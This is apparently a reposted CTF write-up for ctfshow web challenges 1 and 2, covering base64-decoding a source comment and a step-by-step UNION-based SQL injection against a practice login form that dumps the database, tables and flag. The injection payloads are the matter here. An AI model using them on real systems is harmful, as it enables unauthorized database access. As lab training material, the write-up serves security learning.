当前位置:网站首页>ctfshow web 1-2
ctfshow web 1-2
2022-06-12 08:17:00 【hint=flag】
ctfshow web 1-3
The first question is the sign in question 
When I open the link 
Look at the source code :
Found a comment
base64 decode :
web2
Open the link :
It's a login interface , Guess yes sql Inject :
Try to inject points 
With echo , The explanation can sql Inject
Number of blasting injection points :
admin’ union select 1,2,3#
There are three injection points
Blasting database name :
admin’ union select 1,database(),3#
The database name is web
Joint query table name :
admin’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#
There are two tables. flag and user
guess flag It's just flag Inside this watch
On Blasting flag This table :
The joint query :admin’ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘flag’#
Only flag A list of data
Query this column of data :
admin’ union select 1,flag,3 from flag#
Echo directly flag
ctfshow{ef340bd6-5a61-4adc-a889-469bb6e31482}
边栏推荐
- Hands on deep learning -- implementation of multi-layer perceptron from scratch and its concise implementation
- (P40-P41)move资源的转移、forward完美转发
- 模型压缩 | TIP 2022 - 蒸馏位置自适应:Spot-adaptive Knowledge Distillation
- Understanding and analysis of state estimation and Kalman filter
- 计组第一章
- What is an extension method- What are Extension Methods?
- Hands on deep learning -- weight decay and code implementation
- Vscode 调试TS
- (P27-P32)可调用对象、可调用对象包装器、可调用对象绑定器
- (P33-P35)lambda表达式语法,lambda表达式注意事项,lambda表达式本质
猜你喜欢

APS究竟是什么系统呢?看完文章你就知道了

ctfshow web4

(P19-P20)委托构造函数(代理构造函数)和继承构造函数(使用using)

三国杀周边--------猪国杀题解

visual studio2019的asp.net项目添加日志功能

How to write simple music program with MATLAB

HDLC protocol

Py&GO编程技巧篇:逻辑控制避免if else

C # hide the keyboard input on the console (the input content is not displayed on the window)

Hands on deep learning -- discarding method and its code implementation
随机推荐
S-msckf/msckf-vio technical route and code details online blog summary
(P15-P16)对模板右尖括号的优化、函数模板的默认模板参数
Hands on learning and deep learning -- a brief introduction to softmax regression
网站Colab与Kaggle
Principle and example of OpenMP task
A brief summary of C language printf output integer formatter
PPP agreement
Scope of bean
Hands on deep learning -- weight decay and code implementation
Figure neural network makes Google maps more intelligent
Asp Net project add log function
(P27-P32)可调用对象、可调用对象包装器、可调用对象绑定器
MYSQL中的锁的机制
uni-app用canvas截屏并且分享好友
计组第一章
企业上MES系统的驱动力来自哪里?选型又该注意哪些问题?
(P19-P20)委托构造函数(代理构造函数)和继承构造函数(使用using)
Vision Transformer | Arxiv 2205 - LiTv2: Fast Vision Transformers with HiLo Attention
Data visualization and Matplotlib
OpenMP task 原理与实例